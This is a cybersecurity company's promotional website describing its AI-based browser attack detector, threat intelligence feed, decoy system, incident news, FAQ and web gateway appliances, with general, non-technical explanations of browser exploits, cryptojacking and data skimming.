DEKENEAS NEXT-GEN TECHNOLOGIES is a cybersecurity company whose aim is to provide the means and methods needed to address the newest and most complex cyber attacks facing organizations and individuals in today's ever changing threat landscape. Our products encompass more than 30 years of experience in both offensive and defensive fields of operations and they were born from the actual needs security professionals encounter while facing real life attackers. Our flag ship product, the Browser Attack Detector, is an artificial intelligence powered web malware scanner able to discover known and unknwon attacks against browsers, such as exploits, watering holes, crypto jacking or data skimming, for laptops, desktops, mobile, or IoT devices. The concept behind the Browser Attack Detector was presented at multiple esteemed cyber security conferences around the world and among the early adopters of this technology are companies such as ORANGE ROMANIA COMMUNICATIONS SA or public institutions such as Romanian National Cybersecurity Directorate. Along the Browser Attack Detector we also provide our customers with a cybersecurity threat intelligence platform that collects data about attacks against traditional technologies, but also about attacks against ICS/SCADA, medical or IoT technologies, and a decoy system ("Am I Owned") that transforms your networks and devices into honey traps that lure attackers, making them unveil the presence on the premises before they are able to perform any actual damaging actions. For more information about our products consult the detailed presentations for Browser Attack Detector, Cyber Threat Intelligence and Am I Owned or contact us.
BROWSER ATTACKS
Browser attacks are currently some of the most elusive and hard to detect attacks existing in the cyberspace. They do not require the attacker to have previous interactions with the victims, such as sending them e-mails, social media or text messages with spearphishing payloads, they just need the victim to visit the malicious page. And most of the times the malicious pages are the usual pages in legitimate and well established web sites, with many visitors every day, weaponized with a malicious implant. Some of these attacks mine crypto coins using visitor's browsers (cryptojacking), others steal credit card information (data skimming) and others, the most dangerous ones, can take full control of visitor's device (browser exploits), even if the browser is fully updated. Browser attacks focus on traditional devices, such as laptops or desktops, but they also target mobile or IoT devices, which makes it even harder to detect them.
Browser exploits
Browser exploits are programs specially crafted to exploit vulnerabilities inside browsers or technologies used by browsers. A browser exploit can take full control of the attacked device. Lately, browser exploits became the predilect tactic for APT and cybercriminal groups, as they are very hard to detect, some of them having been actively exploiting victims for many months, and even years. Browser exploits can target specific technologies (such as phone makers, browser types, etc.), specific IP addresses, specific browser languages, etc. which makes them even harder to detect through traditional methods.
Cryptojacking
Malicious cryptojacking implants inside legitimate web sites use visitor's device computing power in order to mine for various cryptocurrencies. This behaviour generates latency in overall performance of the device
Data skimming
Data skimming is a web attack in which a malicious implant inside a legitimate e-shop collects the credit card information submitted by the visitor and sends it to the attacker.
THE PROBLEM
The HTTP/S and HTML protocols have different implementations on different browsers, mainly because HTTP was standardized as a protocol years later after browsers emerged, thus allowing browser engines to have their own implementation and interpretation of these protocols.
Once with the introduction of Javascript, the web pages began to act dynamically, instead of serving static content. This means that the final form of the website will only be interpreted by user's browser, after all Javascript is executed in user's browser context. This also means that the security products should know exactly how user's browser interprets and executes the Javascript in the webpage it loads.
Traditional antivirus products or intrusion detection sensors would use signature scanning to identify browser attacks, looking for known code snippets that are involved in these attacks. But in the recent years, browser attacks evolved to using Javascript obfuscation to hide relevant code snippets, making it impossible for traditional security products to detect such attacks.
To counter this behavior, traditional security products try to detect the signature of the actual exploit, or the aftermath of the attack, such as the connection to the command and control server, but if the exploit is unknown or very new, there is no signature for it, and if the command and control server doesn't look suspicious, for instance it's a DNS request or a HTTPS connection to a legitimate but compromised website, the attack goes totally undetected.
So, the only solution seems to be client-side honeypots, which emulate browsers and access websites hoping to find browser attacks. But this approach is very time consuming as modern websites can have hundreds or thousands of pages, and loading each and every one of them in an instrumented environment takes some time. Also, the attackers developed a series of methods to identify instrumented environments, ranging from delayed execution to detection of virtualized environments, which are specific to client-side honeypots. On top of that, the attackers fingerprint the browser, and only attack certain browsers, certain technologies or users from a certain geographical area or IP range.
If the client-side honeypot doesn't guess all of the above, the attack never happens, so the security product fails to identify an offensive web page.
Do browser attacks actually happen?
Unfortunately, yes. Tenths of unknown attacks that compromise devices are discovered yearly in the wild, and we can safely assume many others remain undetected. Due to their specifics, browser exploits are perfect candidates in penetrating highly secured networks from banks, defense industry or government contractors, tech giants such as Facebook, Apple, Twitter, or Microsoft, but also, activist groups, investigative journalists or political disidents all over the world.
This is possible because browsers are very complex pieces of software. With a huge attack surface. While some vulnerabilities get reported and patches are issued, many more vulnerabilities never get reported and are weaponized by attackers as 0day exploits. Some other times, even if the attack is known, there is a months gap between the actual browser update and the moment when, for instance mobile vendors issue the update to their users. This way, even if the attack is reported and a patch was issued, certain users are still vulnerable to the attack as if it was 0day.
Most of the times the victims realize they have been compromised after a very long period of time, sometimes even years, sometimes never, and when they realize the attack happened, it's usually because of luck or coincidence.
Some other times, browser attacks are simply used to mine cryptocurrencies, while other times they are used to steal credit card data from unsuspecting users, such is the case with Magecart attack campaigns.
THE SOLUTION - DEKENEAS BROWSER ATTACK DETECTOR
DEKENEAS uses artificial intelligence to understand the contents of a web page looking for signs and behaviour of malicious activities. Such malicious activities could be the use of encryption or certain coding patterns that are highly specific to malware. Techniques such as symbolic execution or "Code Logic Emulator (CLE)" allow a better understanding of what the code does, before deciding to further analyze the code with "Smart Dynamic Analysis". The "Smart Dynamic Analysis" technology is much more intense and time consuming, therefore it is only used to confirm wether certain elements within the website are actually malicious or not.
If a certain element within the website shows signs of malicious behaviour our "Requirements Extractor (RX)" technology tries to determine wether that element needs certain conditions to run, such as specific user agents, IP addresses or language settings. If the "Requirements Extractor (RX)" technology identifies certain requirements that the element needs in order to run, then the "Smart Dynamic Analysis (SDA)" technology starts to dynamically analyze that element in the specific enviornment requested. For instance, if "Requirements Extractor (RX)" technology identifies a suspicious Javascript that has conditions for a specific iOS mobile browser user agent and specific language settings, the "Smart Dynamic Analysis (SDA)" will analyze the suspicious Javascript in an iOS environment, with the requested browser and that specific language settings.
This behavior greatly reduces the analysis time, as only suspicious HTML elements will be analyzed, in the same time maximizing the accuracy of detection, by creating the specific environment requested by the website code.
The network traffic resulted from the interaction with the malicious HTML element is recorded and analyzed with "Network Attack Detector (NAD)" technology which identifies attack signs inside network traffic.
These unique features allowed DEKENEAS to uncover a series of complex attacks carried by APT groups, but also carried by cybercriminals, all of them using either very new or unknown exploitation vectors.
WHAT IS CYBER THREAT INTELLIGENCE (CTI)
Today’s cyber security climate is constantly evolving and changing, with new threats and new threat actors emerging almost every day. From ransomware gangs to Advanced Persistent Threat nationstate actors, from financially motivated cybercrime gangs to the lone wolf hacker hacking from his mother’s basement, the Internet is a dark place with unknown threats waiting to attack the next victim. Traditional antivirus products and security devices can no longer keep up with the growing complexity of threats they are facing. Cyber Threat Intelligence is knowing who these threats are and what techniques, methods or tools they are using in order to be able to defend against them even before they attack your infrastructure and cause significant damage to your business.
THE RIGHT CYBER THREAT INTELLIGENCE FEED
There are many Cyber Threat Intelligence feeds available, but how to choose the right one for you? The right Cyber Threat Intelligence feed should be relevant to your geographical location, relevant to the industry sector, relevant to the technologies you are using, percentage of unique data, periodicity of data and measurable outcome. Because Cyber Threat Intelligence feeds tend to contain a lot of Indicators Of Compromise (IOC) and each IOC comes with a cost to the device in terms of resources. You do not necessarily need information about attackers targeting Middle East if you operate in Europe, and you are not quite interested in attackers targeting the energy sector if you operate in pharma. You don’t necessarily need IOCs for SMB if your network does not have Samba. And you want a CTI feed with high percentage of unique data, because many commercial feeds simply compile open-source feeds. While open source feeds are of great value to the community, their downside resides in the fact that they are not maintained and sometimes they contain old IOCs who are no longer relevant to today’s climate.
DEKENEAS CYBER THREAT INTELLIGENCE
DEKENEAS NEXT-GEN TECHNOLOGIES in partnership with ORANGE ROMANIA COMMUNICATIONS operate a network telescope and a vast network of honeypots with low, medium and high levels of interaction, for generic services such as HTTP/S, DNS, SMTP, SSH, TELNET, etc. but also for ICS/SCADA and IoT devices specific to certain industries such as pharma, energy, financial, etc. We use the network telescope to understand the latest trends in service attacks in order to be able to deploy if needed new or custom honeypots specific for the attacks we observe. Also, on request we can deploy a honeypot to a specific service you require. Our system collects IP addresses or domains involved in attacks, command and control IP addresses or domains, attacked services information, file names and hashes. All this information is made available to our customers through a threat intelligence feed, accessible through our API endpoint.
AVERAGE TIME TO DETECT AND CONTAIN A BREACH IS 287 DAYS
Safeguarding data is a continual process fraught with challenges and a breach in the protection of that data can have major repercussions. Detecting and reporting a breach in a timely manner is crucial to maintaining compliance standards and ensuring the integrity of an organization’s data. Though many breaches are detected in a timely manner, it is an unfortunate reality that the majority of organizations take months or even years before detecting a breach. In 2019, security teams at Verizon released the Verizon Data Breach Investigations Report; an analysis of many of the year’s big data breaches across organizations. A total of 41,686 security incidents were analyzed in the report, shining a light on a grim reality: While cybercriminals’ first steps towards compromising customer information and data can happen in a span of minutes, the time taken to discover the breach by these malicious actors often takes months. Using the data from the analyzed incidents, Verizon’s security teams determined that a total of 56 percent of breaches took months or even years to detect – a significant sample size given the enormity of cyberspace that the 41,686 analyzed sites represent. This revelation tells us of the growing level of impact a wellestablished system of governance can have for an organization – a system by which attacks can be properly mitigated and reported to save precious time in recovering from a breach. Blue teams regularly engage in the mission of preventing attacks from occurring but having the systems to detect a breach in progress – assuming preventative measures have failed – is just as critical to ensure the integrity of an organization’s systems and the confidentiality of customer data.
TRACING THE STEPS
Data breaches and cyberattacks are not singular events. They are an ongoing process with multiple steps. The first step usually is infiltration, during which an attacker gains a foothold in the network. Infiltration can happen in many ways. It can come by way of targeted credential theft, exploiting vulnerable web applications, third party credential theft, malware, and more. The next step is usually reconnaissance. This is where attackers try to understand what the network architecture is, what access they have via stolen credentials, and where sensitive data is stored. Compare this to thieves breaking into a house in the middle of the night. The first thing they do is check the house's layout and determine where the valuables are being kept. Once attackers are done with basic reconnaissance, usually they will attempt lateral expansion in the network. They move within the network into a higher tier with better access, perform privilege escalation to gain permissions with wider access, acquire sensitive data, and finally exfiltrate it outside the network. These steps take weeks and months to progress, performed via a painstaking trial-and-error process by attackers, as they strive to identify sensitive resources and expand within the network. Usually, in the case of a cyber-attack, we hear only of the first and last steps – infiltration into the network and data exfiltration. But during the steps in between, there is a whole world of activity that often goes unnoticed.
AM I OWNED
We do not provide another network monitoring tool. These tools are known to have problems in detecting complex attacks and sometimes they even unwillingly help the attackers through security holes in their own code. While we acknowledge the importance of intrusion detection sensors and traffic monitoring instruments, we also found that most of the times, in practice this is not enough as even the best ones give a lot of false positives and “noise” traffic, generating significant amounts of information fatigue, making it difficult for the analyst to pinpoint the malicious activities. What we do instead is giving the attackers what they are looking for: juicy documents, user accounts and credentials, database access, etc. But with a twist.. All these resources are decoys, being specifically crafted to “call home” when accessed, just like a tripwire alarm, forcing the attacker to reveal himself before being able to mount further more damaging attacks against the network and devices and giving the beneficiary actionable intelligence needed to counter the threat in a timely manner while at the same time giving the blue team a clear timeline of the attack, based on the chronology of decoys triggered.
22.08.2024
"Google Fixes High-Severity Chrome Flaw Actively Exploited in the Wild" https://www.dekeneas.com/blog/220824.html9.11.2023
"DATA SKIMMING ATTACKS: HOW YOUR CREDIT CARD DATA GETS STOLEN FROM E-COMMERCE SITES" https://www.dekeneas.com/blog/data-skimming.html5.10.2023
"UNMASKING HIDDEN THREATS IN TRADITIONAL TECHNOLOGIES" https://www.dekeneas.com/blog/unmasking-hidden-threats.html19.09.2023
"THE ROLE OF ARTIFICIAL INTELLIGENCE IN DETECTING WEB MALWARE" https://www.dekeneas.com/blog/role-of-ai-in-detecting-web-malware.html12.09.2023
"THE EVOLUTION OF CYBER ATTACKS: FROM BASIC HACKS TO SOPHISTICATED EXPLOITS" https://www.dekeneas.com/blog/evolution-of-cyber-attacks.html07.09.2023
"ALL YOU NEED TO KNOW ABOUT WATERING HOLE ATTACKS" https://www.dekeneas.com/blog/what-are-watering-hole-attacks.html08.03.2023 -- TODAY WE SAVED OUR CUSTOMER FROM BLACKBYTENT RANSOMWARE
One of the customers of AIO (AM I OWNED) product was alerted late last night by some of the decoys deployed inside their infrastructure. Specifically, the first alert was triggered by an Active Directory decoy, soon followed by triggering of various Microsoft Office and PDF decoys placed on a certain workstation inside their network. The incident response team was able to determine with precision the compromised workstation, isolating it from the network and recovering binaries used by the threat actors. After carefully investigating the binaries we were able to assert with certainty that they were part of BlackByteNT ransomware campaign. Also, the incident response team was able to determine that initial access was obtained through a malicious Microsoft Office document sent by e-mail (CVE-2023-21716).06.12.2022 -- ROMANIAN PUBLIC INSTITUTION WEBSITE USED IN WATERING HOLE ATTACK
Romanian public institution in Cluj area used in watering hole attack The exploit was a type confusion in V8 bug affecting Windows, Linux and MacOS Chrome and Microsoft Edge and it was patched in the latest Chrome, version 108.0.5359.94 for Mac and Linux, and to 108.0.5359.94 or 108.0.5359.95 for Windows. We were able to obtain the full exploitation chain and also, the second stage malware thanks to #Dekeneas next-gen dynamic analysis. We haven't been able to perform accurate attribution during this attack. Some other websites may be hosting the same attack code as we discovered this particular attack while one of our users was visiting the watering hole website.14.11.2022 -- NEW PRODUCTS ADDED
DEKENEAS products: Browser Attack Detector Can detect cryptojacking attacks (unauthorized use of browser to mine cryptocurrencies), data skimming attacks (credit card stealing implants, usually in web shops) or known and unknown exploit attacks against Chrome, Firefox, Edge, Safari, for desktops/laptops/servers but also for mobile (Android and iOS) or IoT devices. Cyber Threat Intelligence NEW Custom tailored CTI feed collected from a network of hundreds of devices (honeypots with low, medium or high interaction) for more than 60 different technologies from generic technologies, such as HTTP or SSH, to ICS/SCADA or IoT technologies. Am I Owned NEW We can transform virtually any asset in your network or device into a decoy appealing to hackers. When attackers compromise such an asset you will get an alert, knowing something unauthorized is happening, long before the attacker can impact your organization. Phishing Attack Detection NEW Actively detecting phishing campaigns aimed at your organization, also providing analysis and takedown services.22.02.2022 -- DEKENEAS 2.0 RELEASED
We are thrilled to announce the release of DEKENEAS 2.0, three years after DEKENEAS 1.0 was first introducing the concept of using machine learning to detect browser attacks and malicious web implants. The experience we gathered allowed us to better understand the tactics, techniques and procedures used by skilled actors to exploit and attack browser technologies, and while we constantly improve the technologies used to detect, identify and analyze web based threats, the new release brings a total rewrite from scratch of the whole project, new approaches and technologies. As a result, we added new instructions and code constructs used in malicious implants to our detection algorithm, we developed a new technology called "Code Logic Emulator (CLE)", we improved the "Requirements Extractor (RX)" technology, we replaced the old Javscript sandbox with "Smart Dynamic Analysis (SDA)" for both mobile and desktop environments, supporting various browsers for Windows, Linux, MacOS, Android or iOS, and last, but not least, we added "Network Attack Detector (NAD)" which is also a novel technology aiming to identify exploitation attempts in network traffic. Code Logic Emulator "Code Logic Emulator" (CLE) is a technology we developed in order to maximize the detection probability of malicious web implants by emulating the logic behind the code without the need to emulate the code itself and before deciding to analyze it inside a sandbox environment. Understanding the logic behind the suspicious code adds a great number of new features to the malicious features dataset, which is used to describe the behaviour of a malicious implant, therefore giving a more accurate picture on the functionalities of the code. Requirements Extractor "Requirements Extractor" (RX) is a technology used to identify if the code under scrutiny is requiring specific conditions to run, such as certain user agents, browser settings, language settings, IP address space, etc. This information is used both as features in the malicious features dataset, but also to know a priori what kind of sandbox environment to be started for this specific piece of code. This technology greatly reduces the probability of missing certain malicious activities due to analysis performed in the wrong environment. Smart Dynamic Analysis One of the most important improvements we made to DEKENEAS platform is the implementation of native sandboxes. We designed and created sandboxes for Linux, Windows and MacOS operating systems which are used in classical desktop devices, but also we designed and created sandboxes for mobile devices running on iOS and Android. The sandboxes support various browser technologies, specific to each platform and deploy methods and techniques to deter the identification of the analysis environment by making it appear legitimate. This includes, but is not limited to user interactions, screen sizes, apps and programs installed, etc. Network Attack Detector The "Network Attack Detector" (NAD) is a novel technology able to identify attacks in network traffic. The "Network Attack Detector" decrypts network traffic between client browser and the web server and scans for various indicators of exploitation such as nop sleds, heap spraying, shellcode and other specific indicators of attacks or compromises. All these technologies work together to give a better insight and understanding on how the attacks are performed, providing a hollistic approach on identification and analysis of browser attacks, both on traditional devices such as personal computers, or laptops, but also on mobile devices such as smartphones or tablets. Happy hunting!
CONTACT US
office@dekeneas.com @dekeneas @dekeneas
FREQUENTLY ASKED QUESTIONS
Q: Who is at risk of getting attacked through browser exploits?
A: Considering that browsers are part of our day to day activities, being for work or pleasure, anyone can be targeted with a browser exploit. However, if you work in a sensitive environment, and your job requires you to have access to sensitive organizational resources, the risk of being attacked with a browser exploit increases significantly. But browser exploits are not the only browser attacks..
Q: How could a browser exploit affect my work place?
A: Organizational network defenses have become increasingly performant in the past years, with organizations investing allocating increased budgets to cybersecurity, therefore making it harder for attackers to directly attack organization's network perimeter. But at the same time, organizations tend to not address the insider threat with the same type of resilience. Therefore if you use your smartphone, laptop or tablet to access organizational resources attackers gain a foothold inside the network.
Q: What other browser attacks are outhere, except device compromises through exploits?
A: While browser exploits are the most dangerous type of browser attack, there are also cryptojacking attacks and data skimming attacks. Cryptojacking attacks use your device to mine for cryptocurrencies consuming your CPU cycles for the benefit of the attackers. Data skimming attacks are usually placed in online shops or other type of websites which require the user to enter banking or credit card informations. They are totally invisible to the end user and any security product he may use and they collect these informations to be sent to the attackers. Cyber criminal groups such as Magecart are getting the spotlight in the past years but these types of attacks have been going for at least a decade and they continue to affect hundreds of thousands of websites around the world.
Q: My antivirus is updated to the latest. Am I still vulnerable?
A: Unfortunately yes. Antivirus products use signatures to detect attacks. If a signatures has not been previously generated, the attack goes unnoticed to the antivirus product.
Q: I have the latest next-generation detection and response endpoint protection. Am I still vulnerable?
A: Unfortunately yes. Even the most performant XDR endpoint protection uses some type of signature scanning corroborated with behavioral analysis and even artificial intelligence (AI). However, they cannot be installed on smart phones, tablets or IoT devices. And even for traditional systems, such as desktops or laptops they fail to accurately identify attacks, mostly because browsers are very difficult to inspect and instrument and because these attacks are specifically crafted to look like normal user activities.
Q: I only browse behind my corporate network. Am I still vulnerable?
A: Unfortunately yes. Network defense systems are unable to properly inspect HTTP/S traffic, even if they are able to decrypt the encrypted communication. Dynamic HTML code, such as Javascript, makes it impossible to an intermediate product to know how the final code will be rendered inside user's browser, therefore they are unable to guess wether an attack is happening or not. This is how big banks and corporations have been compromised in the past.
Q: I use a different web malware scanner. Isn't that enough?
A: Unfortunately no. All the commercially available web malware scanners use signature scanning to detect attacks against browsers. While this approach is sufficient to detect known attacks, they have no way of detecting unknown attacks. Most web malware today is crafted in such way that it looks different for every infection, even inside the same website. Also, most of the commercially available web malware scanners only scan the first page of the website, while in reality the attack can be hidden deeper inside the website.
Q: Ok, and how does DEKENEAS does it then?
A: We have an artificial intelligence (AI) algorithm trained to recognize features that might serve a malicious purpose. And we do not consider these features separately, our AI tries to understand how these features could be used in conjunction to serve a malicious purpose. This approach allows us to select only those HTML elements, such as scripts or iframes, that have a high risk of being used for malicious purposes. After this filtering, we launch each suspicious element inside a dynamic analysis environment which mimicks in the slightiest detail the behaviour of a legitimate user, in order to bypass any anti analysis or instrumentation environment detection techniques the malware might use. We record these interactions and also we record all the traffic exchanged between our dynamic analysis environment and the suspicious HTML element. The recorded traffic is analyzed by another AI algorithm in order to determine wether there are any signs of attacks inside the traffic. If there were no interactions during the dynamic analysis and there were no signs of attack inside the network traffic recorded, we still consider the element suspicious, needing manual analysis by one of our specialists.
Q: So every suspicious script is possibly an attack?
A: Sometimes, yes. Some other times, no. There could be an attack that evaded our dynamic analysis environment, and it needs further inspection, but also, sometimes, not very often, legitimate HTML elements use the same techniques as malware and we detect that. But it's better to be safe than sorry.
Q: I started my scan a few hours ago and it still did not finish. Is there something wrong?
A: Normal websites have thousands of pages, each of these pages containing tenths or hundreds of HTML elements that need to be analyzed. Even though our AI is doing a fantastic job at eliminating benign looking elements, there are still tenths or hundreds of these elements that need to be passed to our dynamic analysis environment. This is the most consuming part of the process, as we try to mimick in the slightiest detail the behavior of a normal user. So, especially at the first iteration, a scan could last for a few hours, depending on the number of suspicious HTML elements found.
DEKENEAS
DEKENEAS is a unique product, being the only publicly available tool able to identify with great accuracy both known and unknown browser exploits ("0day") and attacks by the means of artificial intelligence algorithms, instead of traditional signature scanning. Our approach is mainly focused on detection of unknown attack vectors for the vast majority of existing desktop browsers, such as Chrome, Edge, Firefox or Safari, but also mobile devices browsers for Android and iPhone. Our artificial intelligence algorithms understand the code of the website before actually executing it, and tries to understand if the code constructs encountered are malware specific or they are benign. Also it tries to figure out if there are special conditions for certain code to run, such as specific User-Agent strings, language settings or IP addresses. All this information is later used during the instrumentation performed by Dekeneas Sandbox, which comes as a double check, actually executing the suspicious code in a real environment according to the special conditions requested by the analyzed code, launching a specific browser with specific language or country settings in a specific environment (desktop or mobile), and analyzing how the code interacts with the browser. In addition to code instrumentation Dekeneas Sandbox also analyzes the traffic generated looking for exploitation gadgets, therefore maximizing the chances of identifying unknown attacks.
- Signature less scanning - browser malware looks different from infection to infection so signature scanning is mostly useless
- In-depth scanning of websites - most attacks are not placed in the first page
- Code interpretation without actually executing the code - greatly optimizing analysis time
- Detection of attacks in the early stage - as opposed to traditional methods who detect post-exploitation stage of infection
- Anti anti analysis capabilities - most browser attacks are highly obfuscated and have anti analysis capabilities
- Anti evasion capabilities - most browser attacks are able to evade detection by targetting specific browsers, technologies or settings
Dekeneas On-Premise WSG
The Dekeneas WSG range is a family of secure web gateway appliances, integrating the advanced artificial intelligence malware scanning capabilities of the DEKENEAS into your network, protecting your users from some of the most elusive attacks used by hackers.
WSG-010
Virtual Appliance
- Administration interface
- Transparent Proxy (network traffic redirector, WCCP redirect)
- Explicit Proxy (supports PAC installation, WPAD server, Active Directory)
- HTTP/S inspection
- URL filtering based on DEKENEAS
- Integrated DEKENEAS engine
- Supports both IPv4 and IPv6 protocol stacks
- Supports integrations with external threat intelligence feeds, commercial or open source
- Custom and automated whitelisting of websites
- Custom and automated blacklisting of malicious websites
- Automated antivirus scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
WSG-100
Hardware Appliance
- Administration interface
- Transparent Proxy (network traffic redirector, WCCP redirect)
- Explicit Proxy (supports PAC installation, WPAD server, Active Directory)
- HTTP/S inspection
- URL filtering based on DEKENEAS
- Active Directory integration (multi realm, multi forest NTLM, single sign on through browser stored credentials)
- Inline sandbox
- Bandwidth management
- Integrated DEKENEAS engine
- Supports both IPv4 and IPv6 protocol stacks
- Supports integrations with external threat intelligence feeds, commercial or open source
- Custom and automated whitelisting of websites
- Custom and automated blacklisting of malicious websites
- Automated antivirus scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
- Automated YARA scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
- Data leakage prevention through artificial intelligence classification
WSG-200
Hardware Appliance
- High availability setup
- Administration interface
- Transparent Proxy (network traffic redirector, WCCP redirect)
- Explicit Proxy (supports PAC installation, WPAD server, Active Directory)
- HTTP/S inspection
- URL filtering based on DEKENEAS
- Active Directory integration (multi realm, multi forest NTLM, single sign on through browser stored credentials)
- Inline sandbox
- Bandwidth management
- Integrated DEKENEAS engine
- Supports both IPv4 and IPv6 protocol stacks
- Supports integrations with external threat intelligence feeds, commercial or open source
- Custom and automated whitelisting of websites
- Custom and automated blacklisting of malicious websites
- Automated antivirus scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
- Automated YARA scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
- Data leakage prevention through artificial intelligence classification